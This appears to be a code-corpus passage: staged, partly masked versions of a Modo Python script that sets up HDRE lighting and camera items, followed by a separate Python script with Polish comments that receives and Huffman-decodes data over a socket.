%s' % id)\n lx.eval('select.item %s set' % parent)\n lx.eval('texture.delete')\n for clip in oldclips:\n lx.eval('select.drop item')\n lx.eval('select.item {%s} set' % clip)\n lx.eval('clip.delete')\n except:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.\n exc_traceback.tb_lineno))\n\n\ndef renamenew(incr):\n try:\n lx.eval('item.name HDRECam item:{HDRECam%s}' % incr)\n lx.eval('item.name HDRECamAnimate item:{HDRECamAnimate%s}' % incr)\n lx.eval('item.name HDRESun item:{HDRESun%s}' % incr)\n lx.eval('item.name HDRERefl item:{HDRERefl%s}' % incr)\n lx.eval('item.name HDREBackplate item:{HDREBackplate%s}' % incr)\n lx.eval('item.name HDREEnv item:{HDREEnv%s}' % incr)\n lx.eval('item.name {HDREActivate} item:{HDREActivate%s}' % incr)\n lx.eval('item.name {HDREWater} item:{HDREWater%s}' % incr)\n lx.eval('item.name {HDREShadowGround} item:{HDREShadowGround%s}' % incr\n )\n lx.eval('item.name {HDREControls} item:{HDREControls%s}' % incr)\n lx.eval('item.name {BackdropBrowser} item:{BackdropBrowser%s}' % incr)\n lx.eval('item.name {Texture Group} item:{Texture Group%s}' % incr)\n lx.eval('item.name {HDREGroup} item:{HDREGroup%s}' % incr)\n root = lx.eval('query sceneservice item.parent ? HDRECam')\n rootname = lx.eval('query sceneservice item.name ? %s' % root)\n newname = rootname.split(incr)[0]\n lx.eval('item.name {%s} item:{%s}' % (newname, rootname))\n except:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.\n exc_traceback.tb_lineno))\n\n\ndef tagitems():\n try:\n lx.eval('select.drop item')\n for item in HDREEnvs:\n lx.eval('select.item {%s} set' % item)\n lx.eval('item.tag string {HDRE} {set}')\n lx.eval('select.item {%s} set' % rootID)\n lx.eval('item.tag string {HDRE} {set}')\n except:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.\n exc_traceback.tb_lineno))\n\n\ndef setframesize():\n try:\n backplate = None\n envchildren = lx.eval(\n 'query sceneservice item.children ? 
HDREBackplate')\n for child in envchildren:\n if lx.eval('query sceneservice item.type ? {%s}' % child\n ) == 'imageMap':\n lx.eval('select.item %s set' % child)\n backplate = lx.eval('texture.setIMap ?')\n break\n if backplate:\n clip_width = None\n clip_height = None\n clips = lx.evalN('query layerservice clips ? all')\n for clip in clips:\n if lx.eval('query layerservice clip.name ? {%s}' % clip\n ) == backplate:\n info = lx.eval('query layerservice clip.info ? {%s}' % clip\n ).split()\n clip_width = float(info[1].split(':')[1])\n clip_height = float(info[2].split(':')[1])\n if clip_width != None and clip_height != None:\n if clip_width > clip_height:\n frame_width = 1024\n frame_height = int(clip_height / clip_width * 1024)\n else:\n frame_height = 1024\n frame_width = int(clip_width / clip_height * 1024)\n lx.eval('render.res 0 %s' % frame_width)\n lx.eval('render.res 1 %s' % frame_height)\n except:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.\n exc_traceback.tb_lineno))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef itemexists(name):\n lx.eval('select.item {%s} set' % name)\n selected = lx.evalN('item.name ?')\n return name in selected\n\n\ndef lockcamera():\n if not itemexists('HDRECam_Grp'):\n lx.eval('select.drop item')\n lx.eval('group.create')\n lx.eval('item.name HDRECam_Grp')\n lx.eval('select.subItem HDRECam set camera')\n lx.eval('!!group.edit add item')\n lx.eval('select.item HDRECam_Grp set')\n lx.eval('item.channel lock on item:HDRECam_Grp')\n\n\ndef lockanimcamera():\n if not itemexists('HDRECamAnimate_Grp'):\n lx.eval('select.drop item')\n lx.eval('group.create')\n lx.eval('item.name HDRECamAnimate_Grp')\n xfrmitem = lx.eval('query sceneservice item.xfrmPos ? HDRECamAnimate')\n lx.eval('select.channel {%s:pos.X} set' % xfrmitem)\n lx.eval('select.channel {%s:pos.Y} add' % xfrmitem)\n lx.eval('select.channel {%s:pos.Z} add' % xfrmitem)\n lx.eval('!!group.edit add chan')\n lx.eval('item.channel lock on item:HDRECamAnimate_Grp')\n\n\ndef hastag(item):\n lx.eval('select.drop item')\n lx.eval('select.item {%s} set' % item)\n if lx.eval('item.tag HDRE ?') == 'set':\n return true\n\n\ndef clearold():\n try:\n numenvs = lx.eval('query sceneservice environment.N ? all')\n envs = []\n oldclips = []\n for x in xrange(numenvs):\n envs.append(lx.eval('query sceneservice environment.ID ? %s' % x))\n for env in envs:\n lx.eval('select.item %s set' % env)\n if lx.eval('item.tag string HDRE ?') == 'set':\n layer, process = lx.eval(\n 'query sceneservice mask.children ? {%s}' % env)\n lx.eval('select.item {%s} set' % layer)\n oldclips.append(lx.eval('texture.setIMap ?'))\n for env in envs:\n lx.eval('select.item %s set' % env)\n if lx.eval('item.tag string HDRE ?') == 'set':\n lx.eval('!!item.delete')\n numgrplocs = lx.eval('query sceneservice groupLocator.N ? all')\n grplocs = []\n for x in xrange(numgrplocs):\n grplocs.append(lx.eval(\n 'query sceneservice groupLocator.ID ? 
%s' % x))\n for loc in grplocs:\n lx.eval('select.item %s set' % loc)\n if lx.eval('item.tag string HDRE ?') == 'set':\n lx.eval('!!item.delete')\n break\n lx.eval('select.itemPattern HDREGroup')\n id = lx.eval1('query sceneservice selection ? mask')\n parent = lx.eval('query sceneservice mask.parent ? %s' % id)\n lx.eval('select.item %s set' % parent)\n lx.eval('texture.delete')\n for clip in oldclips:\n lx.eval('select.drop item')\n lx.eval('select.item {%s} set' % clip)\n lx.eval('clip.delete')\n except:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.\n exc_traceback.tb_lineno))\n\n\ndef renamenew(incr):\n try:\n lx.eval('item.name HDRECam item:{HDRECam%s}' % incr)\n lx.eval('item.name HDRECamAnimate item:{HDRECamAnimate%s}' % incr)\n lx.eval('item.name HDRESun item:{HDRESun%s}' % incr)\n lx.eval('item.name HDRERefl item:{HDRERefl%s}' % incr)\n lx.eval('item.name HDREBackplate item:{HDREBackplate%s}' % incr)\n lx.eval('item.name HDREEnv item:{HDREEnv%s}' % incr)\n lx.eval('item.name {HDREActivate} item:{HDREActivate%s}' % incr)\n lx.eval('item.name {HDREWater} item:{HDREWater%s}' % incr)\n lx.eval('item.name {HDREShadowGround} item:{HDREShadowGround%s}' % incr\n )\n lx.eval('item.name {HDREControls} item:{HDREControls%s}' % incr)\n lx.eval('item.name {BackdropBrowser} item:{BackdropBrowser%s}' % incr)\n lx.eval('item.name {Texture Group} item:{Texture Group%s}' % incr)\n lx.eval('item.name {HDREGroup} item:{HDREGroup%s}' % incr)\n root = lx.eval('query sceneservice item.parent ? HDRECam')\n rootname = lx.eval('query sceneservice item.name ? 
%s' % root)\n newname = rootname.split(incr)[0]\n lx.eval('item.name {%s} item:{%s}' % (newname, rootname))\n except:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.\n exc_traceback.tb_lineno))\n\n\ndef tagitems():\n try:\n lx.eval('select.drop item')\n for item in HDREEnvs:\n lx.eval('select.item {%s} set' % item)\n lx.eval('item.tag string {HDRE} {set}')\n lx.eval('select.item {%s} set' % rootID)\n lx.eval('item.tag string {HDRE} {set}')\n except:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.\n exc_traceback.tb_lineno))\n\n\ndef setframesize():\n try:\n backplate = None\n envchildren = lx.eval(\n 'query sceneservice item.children ? HDREBackplate')\n for child in envchildren:\n if lx.eval('query sceneservice item.type ? {%s}' % child\n ) == 'imageMap':\n lx.eval('select.item %s set' % child)\n backplate = lx.eval('texture.setIMap ?')\n break\n if backplate:\n clip_width = None\n clip_height = None\n clips = lx.evalN('query layerservice clips ? all')\n for clip in clips:\n if lx.eval('query layerservice clip.name ? {%s}' % clip\n ) == backplate:\n info = lx.eval('query layerservice clip.info ? {%s}' % clip\n ).split()\n clip_width = float(info[1].split(':')[1])\n clip_height = float(info[2].split(':')[1])\n if clip_width != None and clip_height != None:\n if clip_width > clip_height:\n frame_width = 1024\n frame_height = int(clip_height / clip_width * 1024)\n else:\n frame_height = 1024\n frame_width = int(clip_width / clip_height * 1024)\n lx.eval('render.res 0 %s' % frame_width)\n lx.eval('render.res 1 %s' % frame_height)\n except:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.\n exc_traceback.tb_lineno))\n\n\ntry:\n if lx.eval('query scriptsysservice userValue.isDefined ? HDRE_Card'):\n cookie = lx.eval('user.value HDRE_Card ?')\n lx.eval('layout.createOrClose {%s} open:0' % cookie)\n selectedItem = lx.eval1('query sceneservice selection ? locator')\n rootID = lx.eval('query sceneservice item.parent ? 
%s' % selectedItem)\n numcams = lx.eval('query sceneservice camera.N ? all')\n for x in xrange(numcams):\n camname = lx.eval('query sceneservice camera.name ? %s' % x)\n if camname in camnames.keys():\n incr = camnames[camname]\n clearold()\n renamenew(incr)\n break\n if itemexists('HDRECam'):\n if itemexists('HDRECamAnimate'):\n flength = round(lx.eval('item.channel focalLen ? item:HDRECam'), 3\n ) * 1000\n if flength >= 101 and flength <= 200:\n flength = flength + 100\n elif flength >= 51 and flength <= 100:\n flength = flength + 50\n elif flength >= 18 and flength <= 50:\n flength = flength + 10\n lx.eval('item.channel focalLen [%s mm] item:HDRECamAnimate' %\n flength)\n lx.eval('render.camera HDRECamAnimate')\n lockanimcamera()\n lx.eval('render.camera HDRECam')\n lockcamera()\n renID = lx.eval('query sceneservice polyRender.ID ? 0')\n lx.eval('item.channel globEnable true item:%s' % renID)\n lx.eval('item.channel dispRate 3 item:%s' % renID)\n lx.eval('item.channel dispRatio 8 item:%s' % renID)\n numouts = lx.eval('query sceneservice renderOutput.N ? all')\n for x in xrange(numouts):\n id = lx.eval('query sceneservice renderOutput.ID ? %s' % x)\n lx.eval('select.item %s set' % id)\n if lx.eval('shader.setEffect ?') == 'shade.color':\n lx.eval('item.channel gamma 2.2 item:%s' % id)\n num_envs = lx.eval('query sceneservice environment.N ? all')\n environments = []\n for x in xrange(num_envs):\n environments.append(lx.eval(\n 'query sceneservice environment.name ? %s' % x))\n for env in environments:\n if env not in HDREEnvs:\n lx.eval('item.channel visCam false item:{%s}' % env)\n lx.eval('item.channel visInd false item:{%s}' % env)\n lx.eval('item.channel visRefl false item:{%s}' % env)\n lx.eval('item.channel visRefr false item:{%s}' % env)\n numlights = lx.eval('query sceneservice light.N ? all')\n for x in xrange(numlights):\n if lx.eval('query sceneservice light.name ? %s' % x) != 'HDRESun':\n id = lx.eval('query sceneservice light.ID ? 
%s' % x)\n lx.eval('layer.setVisibility {%s} 0' % id)\n if itemexists('HDREActivate'):\n lx.eval('layer.setVisibility {HDREActivate} 0')\n controlsID = lx.eval('query sceneservice item.ID ? HDREControls')\n if controlsID:\n lx.eval('layer.setVisibility {%s} 1' % controlsID)\n setframesize()\n tagitems()\nexcept:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.exc_traceback\n .tb_lineno))\n",
"step-4": "camnames = {'HDRECam (2)': ' (2)', 'HDRECam(2)': '(2)', 'HDRECam 2': ' 2',\n 'HDRECam_2': '_2', 'HDRECam2': '2'}\nHDREEnvs = ['HDRERefl', 'HDREBackplate', 'HDREEnv']\n\n\ndef itemexists(name):\n lx.eval('select.item {%s} set' % name)\n selected = lx.evalN('item.name ?')\n return name in selected\n\n\ndef lockcamera():\n if not itemexists('HDRECam_Grp'):\n lx.eval('select.drop item')\n lx.eval('group.create')\n lx.eval('item.name HDRECam_Grp')\n lx.eval('select.subItem HDRECam set camera')\n lx.eval('!!group.edit add item')\n lx.eval('select.item HDRECam_Grp set')\n lx.eval('item.channel lock on item:HDRECam_Grp')\n\n\ndef lockanimcamera():\n if not itemexists('HDRECamAnimate_Grp'):\n lx.eval('select.drop item')\n lx.eval('group.create')\n lx.eval('item.name HDRECamAnimate_Grp')\n xfrmitem = lx.eval('query sceneservice item.xfrmPos ? HDRECamAnimate')\n lx.eval('select.channel {%s:pos.X} set' % xfrmitem)\n lx.eval('select.channel {%s:pos.Y} add' % xfrmitem)\n lx.eval('select.channel {%s:pos.Z} add' % xfrmitem)\n lx.eval('!!group.edit add chan')\n lx.eval('item.channel lock on item:HDRECamAnimate_Grp')\n\n\ndef hastag(item):\n lx.eval('select.drop item')\n lx.eval('select.item {%s} set' % item)\n if lx.eval('item.tag HDRE ?') == 'set':\n return true\n\n\ndef clearold():\n try:\n numenvs = lx.eval('query sceneservice environment.N ? all')\n envs = []\n oldclips = []\n for x in xrange(numenvs):\n envs.append(lx.eval('query sceneservice environment.ID ? %s' % x))\n for env in envs:\n lx.eval('select.item %s set' % env)\n if lx.eval('item.tag string HDRE ?') == 'set':\n layer, process = lx.eval(\n 'query sceneservice mask.children ? {%s}' % env)\n lx.eval('select.item {%s} set' % layer)\n oldclips.append(lx.eval('texture.setIMap ?'))\n for env in envs:\n lx.eval('select.item %s set' % env)\n if lx.eval('item.tag string HDRE ?') == 'set':\n lx.eval('!!item.delete')\n numgrplocs = lx.eval('query sceneservice groupLocator.N ? 
all')\n grplocs = []\n for x in xrange(numgrplocs):\n grplocs.append(lx.eval(\n 'query sceneservice groupLocator.ID ? %s' % x))\n for loc in grplocs:\n lx.eval('select.item %s set' % loc)\n if lx.eval('item.tag string HDRE ?') == 'set':\n lx.eval('!!item.delete')\n break\n lx.eval('select.itemPattern HDREGroup')\n id = lx.eval1('query sceneservice selection ? mask')\n parent = lx.eval('query sceneservice mask.parent ? %s' % id)\n lx.eval('select.item %s set' % parent)\n lx.eval('texture.delete')\n for clip in oldclips:\n lx.eval('select.drop item')\n lx.eval('select.item {%s} set' % clip)\n lx.eval('clip.delete')\n except:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.\n exc_traceback.tb_lineno))\n\n\ndef renamenew(incr):\n try:\n lx.eval('item.name HDRECam item:{HDRECam%s}' % incr)\n lx.eval('item.name HDRECamAnimate item:{HDRECamAnimate%s}' % incr)\n lx.eval('item.name HDRESun item:{HDRESun%s}' % incr)\n lx.eval('item.name HDRERefl item:{HDRERefl%s}' % incr)\n lx.eval('item.name HDREBackplate item:{HDREBackplate%s}' % incr)\n lx.eval('item.name HDREEnv item:{HDREEnv%s}' % incr)\n lx.eval('item.name {HDREActivate} item:{HDREActivate%s}' % incr)\n lx.eval('item.name {HDREWater} item:{HDREWater%s}' % incr)\n lx.eval('item.name {HDREShadowGround} item:{HDREShadowGround%s}' % incr\n )\n lx.eval('item.name {HDREControls} item:{HDREControls%s}' % incr)\n lx.eval('item.name {BackdropBrowser} item:{BackdropBrowser%s}' % incr)\n lx.eval('item.name {Texture Group} item:{Texture Group%s}' % incr)\n lx.eval('item.name {HDREGroup} item:{HDREGroup%s}' % incr)\n root = lx.eval('query sceneservice item.parent ? HDRECam')\n rootname = lx.eval('query sceneservice item.name ? 
%s' % root)\n newname = rootname.split(incr)[0]\n lx.eval('item.name {%s} item:{%s}' % (newname, rootname))\n except:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.\n exc_traceback.tb_lineno))\n\n\ndef tagitems():\n try:\n lx.eval('select.drop item')\n for item in HDREEnvs:\n lx.eval('select.item {%s} set' % item)\n lx.eval('item.tag string {HDRE} {set}')\n lx.eval('select.item {%s} set' % rootID)\n lx.eval('item.tag string {HDRE} {set}')\n except:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.\n exc_traceback.tb_lineno))\n\n\ndef setframesize():\n try:\n backplate = None\n envchildren = lx.eval(\n 'query sceneservice item.children ? HDREBackplate')\n for child in envchildren:\n if lx.eval('query sceneservice item.type ? {%s}' % child\n ) == 'imageMap':\n lx.eval('select.item %s set' % child)\n backplate = lx.eval('texture.setIMap ?')\n break\n if backplate:\n clip_width = None\n clip_height = None\n clips = lx.evalN('query layerservice clips ? all')\n for clip in clips:\n if lx.eval('query layerservice clip.name ? {%s}' % clip\n ) == backplate:\n info = lx.eval('query layerservice clip.info ? {%s}' % clip\n ).split()\n clip_width = float(info[1].split(':')[1])\n clip_height = float(info[2].split(':')[1])\n if clip_width != None and clip_height != None:\n if clip_width > clip_height:\n frame_width = 1024\n frame_height = int(clip_height / clip_width * 1024)\n else:\n frame_height = 1024\n frame_width = int(clip_width / clip_height * 1024)\n lx.eval('render.res 0 %s' % frame_width)\n lx.eval('render.res 1 %s' % frame_height)\n except:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.\n exc_traceback.tb_lineno))\n\n\ntry:\n if lx.eval('query scriptsysservice userValue.isDefined ? HDRE_Card'):\n cookie = lx.eval('user.value HDRE_Card ?')\n lx.eval('layout.createOrClose {%s} open:0' % cookie)\n selectedItem = lx.eval1('query sceneservice selection ? locator')\n rootID = lx.eval('query sceneservice item.parent ? 
%s' % selectedItem)\n numcams = lx.eval('query sceneservice camera.N ? all')\n for x in xrange(numcams):\n camname = lx.eval('query sceneservice camera.name ? %s' % x)\n if camname in camnames.keys():\n incr = camnames[camname]\n clearold()\n renamenew(incr)\n break\n if itemexists('HDRECam'):\n if itemexists('HDRECamAnimate'):\n flength = round(lx.eval('item.channel focalLen ? item:HDRECam'), 3\n ) * 1000\n if flength >= 101 and flength <= 200:\n flength = flength + 100\n elif flength >= 51 and flength <= 100:\n flength = flength + 50\n elif flength >= 18 and flength <= 50:\n flength = flength + 10\n lx.eval('item.channel focalLen [%s mm] item:HDRECamAnimate' %\n flength)\n lx.eval('render.camera HDRECamAnimate')\n lockanimcamera()\n lx.eval('render.camera HDRECam')\n lockcamera()\n renID = lx.eval('query sceneservice polyRender.ID ? 0')\n lx.eval('item.channel globEnable true item:%s' % renID)\n lx.eval('item.channel dispRate 3 item:%s' % renID)\n lx.eval('item.channel dispRatio 8 item:%s' % renID)\n numouts = lx.eval('query sceneservice renderOutput.N ? all')\n for x in xrange(numouts):\n id = lx.eval('query sceneservice renderOutput.ID ? %s' % x)\n lx.eval('select.item %s set' % id)\n if lx.eval('shader.setEffect ?') == 'shade.color':\n lx.eval('item.channel gamma 2.2 item:%s' % id)\n num_envs = lx.eval('query sceneservice environment.N ? all')\n environments = []\n for x in xrange(num_envs):\n environments.append(lx.eval(\n 'query sceneservice environment.name ? %s' % x))\n for env in environments:\n if env not in HDREEnvs:\n lx.eval('item.channel visCam false item:{%s}' % env)\n lx.eval('item.channel visInd false item:{%s}' % env)\n lx.eval('item.channel visRefl false item:{%s}' % env)\n lx.eval('item.channel visRefr false item:{%s}' % env)\n numlights = lx.eval('query sceneservice light.N ? all')\n for x in xrange(numlights):\n if lx.eval('query sceneservice light.name ? %s' % x) != 'HDRESun':\n id = lx.eval('query sceneservice light.ID ? 
%s' % x)\n lx.eval('layer.setVisibility {%s} 0' % id)\n if itemexists('HDREActivate'):\n lx.eval('layer.setVisibility {HDREActivate} 0')\n controlsID = lx.eval('query sceneservice item.ID ? HDREControls')\n if controlsID:\n lx.eval('layer.setVisibility {%s} 1' % controlsID)\n setframesize()\n tagitems()\nexcept:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.exc_traceback\n .tb_lineno))\n",
"step-5": "#!/usr/bin/env python\n\n################################################################################\n#\n# HDREEnable.py\n#\n# Version: 1.000\n#\n# Author: Gwynne Reddick\n#\n# Description:\n# \n#\n# Usage: \n#\n# Last Update 16:49 08/12/10 \n#\n################################################################################\n\n# part of a hack for later on so we can identify if a second HDRE assembly has been applied\ncamnames = {'HDRECam (2)':' (2)',\n 'HDRECam(2)':'(2)',\n 'HDRECam 2':' 2',\n 'HDRECam_2':'_2',\n 'HDRECam2':'2'}\n\nHDREEnvs = ['HDRERefl', 'HDREBackplate', 'HDREEnv']\n\ndef itemexists(name):\n lx.eval('select.item {%s} set' % name)\n selected = lx.evalN('item.name ?')\n return name in selected\n\ndef lockcamera():\n if not itemexists('HDRECam_Grp'):\n lx.eval('select.drop item')\n lx.eval('group.create')\n lx.eval('item.name HDRECam_Grp')\n lx.eval('select.subItem HDRECam set camera')\n lx.eval('!!group.edit add item')\n lx.eval('select.item HDRECam_Grp set')\n lx.eval('item.channel lock on item:HDRECam_Grp')\n\ndef lockanimcamera():\n if not itemexists('HDRECamAnimate_Grp'):\n lx.eval('select.drop item')\n lx.eval('group.create')\n lx.eval('item.name HDRECamAnimate_Grp')\n xfrmitem = lx.eval('query sceneservice item.xfrmPos ? HDRECamAnimate')\n lx.eval('select.channel {%s:pos.X} set' % xfrmitem)\n lx.eval('select.channel {%s:pos.Y} add' % xfrmitem)\n lx.eval('select.channel {%s:pos.Z} add' % xfrmitem)\n lx.eval('!!group.edit add chan')\n lx.eval('item.channel lock on item:HDRECamAnimate_Grp')\n \n\ndef hastag(item):\n lx.eval('select.drop item')\n lx.eval('select.item {%s} set' % item)\n if lx.eval('item.tag HDRE ?') == 'set':\n return true\n\ndef clearold():\n try:\n numenvs = lx.eval('query sceneservice environment.N ? all')\n envs = []\n oldclips = []\n for x in xrange(numenvs):\n envs.append(lx.eval('query sceneservice environment.ID ? %s' % x))\n # need a hack here to work round what appears to be a bug. 
We need to collect a\n # list of clips to delete after deleting the env items. For some reason we have\n # to collect the list in one loop, then delete the env items in a second loop\n # otherwise querying the env refl image returns None. I think this is because the\n # env image layer is originally an instance\n for env in envs:\n lx.eval('select.item %s set' % env)\n if lx.eval('item.tag string HDRE ?') == 'set':\n layer, process = lx.eval('query sceneservice mask.children ? {%s}' % env)\n lx.eval('select.item {%s} set' % layer)\n oldclips.append(lx.eval('texture.setIMap ?'))\n # now delete the env items\n for env in envs:\n lx.eval('select.item %s set' % env)\n if lx.eval('item.tag string HDRE ?') == 'set':\n lx.eval('!!item.delete')\n numgrplocs = lx.eval('query sceneservice groupLocator.N ? all')\n grplocs = []\n for x in xrange(numgrplocs):\n grplocs.append(lx.eval('query sceneservice groupLocator.ID ? %s' % x))\n for loc in grplocs:\n lx.eval('select.item %s set' % loc)\n if lx.eval('item.tag string HDRE ?') == 'set':\n lx.eval('!!item.delete')\n break\n \n # clear old ground and water material groups\n lx.eval('select.itemPattern HDREGroup')\n id = lx.eval1('query sceneservice selection ? mask')\n parent = lx.eval('query sceneservice mask.parent ? 
%s' % id)\n lx.eval('select.item %s set' % parent)\n lx.eval('texture.delete')\n \n # clear old clips\n for clip in oldclips:\n lx.eval('select.drop item')\n lx.eval('select.item {%s} set' % clip)\n lx.eval('clip.delete')\n except:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.exc_traceback.tb_lineno))\n\ndef renamenew(incr):\n try:\n lx.eval('item.name HDRECam item:{HDRECam%s}' % incr)\n lx.eval('item.name HDRECamAnimate item:{HDRECamAnimate%s}' % incr)\n lx.eval('item.name HDRESun item:{HDRESun%s}' % incr)\n lx.eval('item.name HDRERefl item:{HDRERefl%s}' % incr)\n lx.eval('item.name HDREBackplate item:{HDREBackplate%s}' % incr)\n lx.eval('item.name HDREEnv item:{HDREEnv%s}' % incr)\n lx.eval('item.name {HDREActivate} item:{HDREActivate%s}' % incr)\n lx.eval('item.name {HDREWater} item:{HDREWater%s}' % incr)\n lx.eval('item.name {HDREShadowGround} item:{HDREShadowGround%s}' % incr)\n lx.eval('item.name {HDREControls} item:{HDREControls%s}' % incr)\n lx.eval('item.name {BackdropBrowser} item:{BackdropBrowser%s}' % incr)\n lx.eval('item.name {Texture Group} item:{Texture Group%s}' % incr)\n lx.eval('item.name {HDREGroup} item:{HDREGroup%s}' % incr)\n # rename the parent group\n root = lx.eval('query sceneservice item.parent ? HDRECam')\n rootname = lx.eval('query sceneservice item.name ? 
%s' % root)\n newname = rootname.split(incr)[0]\n lx.eval('item.name {%s} item:{%s}' % (newname, rootname))\n\n except:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.exc_traceback.tb_lineno))\n\ndef tagitems():\n try:\n lx.eval('select.drop item')\n for item in HDREEnvs:\n lx.eval('select.item {%s} set' % item)\n lx.eval('item.tag string {HDRE} {set}')\n lx.eval('select.item {%s} set' % rootID)\n lx.eval('item.tag string {HDRE} {set}')\n except:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.exc_traceback.tb_lineno))\n \n\ndef setframesize():\n try:\n backplate = None\n # find the backplate\n envchildren = lx.eval('query sceneservice item.children ? HDREBackplate')\n for child in envchildren:\n if lx.eval('query sceneservice item.type ? {%s}' % child) == 'imageMap':\n lx.eval('select.item %s set' % child)\n backplate = lx.eval('texture.setIMap ?')\n break\n if backplate:\n clip_width = None\n clip_height = None\n # set render frame size and film back aspect aspect\n clips = lx.evalN('query layerservice clips ? all')\n for clip in clips:\n if lx.eval('query layerservice clip.name ? {%s}' % clip) == backplate:\n info = lx.eval('query layerservice clip.info ? {%s}' % clip).split()\n clip_width = float(info[1].split(':')[1])\n clip_height = float(info[2].split(':')[1])\n \n if clip_width != None and clip_height != None:\n if clip_width > clip_height:\n frame_width = 1024\n frame_height = int((clip_height/clip_width) * 1024)\n else:\n frame_height = 1024\n frame_width = int((clip_width/clip_height) * 1024)\n lx.eval('render.res 0 %s' % frame_width)\n lx.eval('render.res 1 %s' % frame_height)\n except:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.exc_traceback.tb_lineno))\n\ntry:\n # close previously open backdrop browser if there is one\n if lx.eval('query scriptsysservice userValue.isDefined ? 
HDRE_Card'):\n cookie = lx.eval('user.value HDRE_Card ?')\n lx.eval('layout.createOrClose {%s} open:0' % cookie)\n \n selectedItem = lx.eval1('query sceneservice selection ? locator')\n rootID = lx.eval('query sceneservice item.parent ? %s' % selectedItem)\n \n # check to see if an HDRE environment already exists and clear it out if it does.\n # this is a bit of a hack, we have to test to see if one of our known items exists\n # with an incremented name. If it does we delete all HDRE items with names that\n # are not incremented and then rename all the ones that are - YUK!!!!\n \n numcams = lx.eval('query sceneservice camera.N ? all')\n for x in xrange(numcams):\n camname = lx.eval('query sceneservice camera.name ? %s' % x)\n if camname in camnames.keys():\n incr = camnames[camname]\n clearold()\n renamenew(incr)\n break\n \n if itemexists('HDRECam'):\n # set animate camera focal length\n if itemexists('HDRECamAnimate'):\n flength = round(lx.eval('item.channel focalLen ? item:HDRECam'), 3) * 1000\n if flength >= 101 and flength <= 200:\n flength = flength + 100\n elif flength >= 51 and flength <= 100:\n flength = flength + 50\n elif flength >= 18 and flength <= 50:\n flength = flength + 10\n lx.eval('item.channel focalLen [%s mm] item:HDRECamAnimate' % flength)\n lx.eval('render.camera HDRECamAnimate')\n lockanimcamera()\n lx.eval('render.camera HDRECam')\n # group and lock the camera\n lockcamera()\n \n renID = lx.eval('query sceneservice polyRender.ID ? 0')\n lx.eval('item.channel globEnable true item:%s' % renID)\n lx.eval('item.channel dispRate 3 item:%s' % renID)\n lx.eval('item.channel dispRatio 8 item:%s' % renID)\n # set the scene gamma\n numouts = lx.eval('query sceneservice renderOutput.N ? all')\n for x in xrange(numouts):\n id = lx.eval('query sceneservice renderOutput.ID ? 
%s' % x)\n lx.eval('select.item %s set' % id)\n if lx.eval('shader.setEffect ?') == 'shade.color':\n lx.eval('item.channel gamma 2.2 item:%s' % id)\n \n num_envs = lx.eval('query sceneservice environment.N ? all')\n environments = []\n for x in xrange(num_envs):\n environments.append(lx.eval('query sceneservice environment.name ? %s' % x))\n for env in environments:\n if env not in HDREEnvs:\n lx.eval('item.channel visCam false item:{%s}' % env)\n lx.eval('item.channel visInd false item:{%s}' % env)\n lx.eval('item.channel visRefl false item:{%s}' % env)\n lx.eval('item.channel visRefr false item:{%s}' % env)\n \n numlights = lx.eval('query sceneservice light.N ? all')\n for x in xrange(numlights):\n if lx.eval('query sceneservice light.name ? %s' % x) != 'HDRESun':\n id = lx.eval('query sceneservice light.ID ? %s' % x)\n lx.eval('layer.setVisibility {%s} 0' % id)\n \n if itemexists('HDREActivate'):\n lx.eval('layer.setVisibility {HDREActivate} 0')\n \n controlsID = lx.eval('query sceneservice item.ID ? HDREControls')\n if controlsID:\n lx.eval('layer.setVisibility {%s} 1' % controlsID)\n \n # set render frame size\n setframesize()\n tagitems()\n \nexcept:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.exc_traceback.tb_lineno))\n",
"step-ids": [
6,
7,
9,
10,
11
]
}
|
[
6,
7,
9,
10,
11
] |
import socket
END = bytearray()
END.append(255)
print(END[0])
def recvall(sock): # Odbiór danych
BUFF_SIZE = 4096 # 4 KiB
data = b''
while True: # odbieramy dane, pakiety 4KiB
part = sock.recv(BUFF_SIZE)
data += part
if len(part) < BUFF_SIZE:
# 0 lub koniec danych
break
return data
def create_dict(data): # Odczytuje otrzymany słownik
dict = {}
i = 0
while True:
dict[chr(data[i])] = ''
j = 1
while data[i + j] != END[0]: # Dopóki nie znajdzie FF, uznaje bajty za 'kod' slowa
dict[chr(data[i])] += str(chr(data[i + j]))
j += 1
i += 1 + j
if data[i] == END[0] and data[i + 1] == END[0]: # Gdy znajdzie 3x FF, kończy słownik
break
return dict
def extract_start(data): # Poszukuje pącztka segmentu danych
i = 0
while True:
if data[i] == END[0] and data[i + 1] == END[0] and data[i + 2] == END[0]:
return i + 3
i += 1
def bytes_to_bits(data, begin): # Zamienia bajty na znakowy odpowiednik w bitach
bits = ''
for i in range(begin, len(data)):
bits += format(data[i], "08b")
return bits
def data_to_extract(data, dict): # Otrzymane dane na podstawie slownika odczytuje do tekstu
begin = extract_start(data) # Szukamy początku tekstu
print(begin)
data = bytes_to_bits(data, begin)
dict = {y: x for x, y in dict.items()} # Zamiana kluczy z wartością w słowniku
text = ''
temp_code = ''
for i in range(len(data)): # Dla kazdego bitu
temp_code += data[i]
if temp_code in dict: # Szukamy czy utworzona tymczasowo zmienna nie zawiera się
# w słowniku
text += dict[temp_code]
temp_code = ''
return text
def recieve_data(codedpath, decodedpath, ip, port):
port = int(port) #Segment odpowiedzialny za utworzenie połaczenia przy użyciu gniazda
sock = socket.socket()
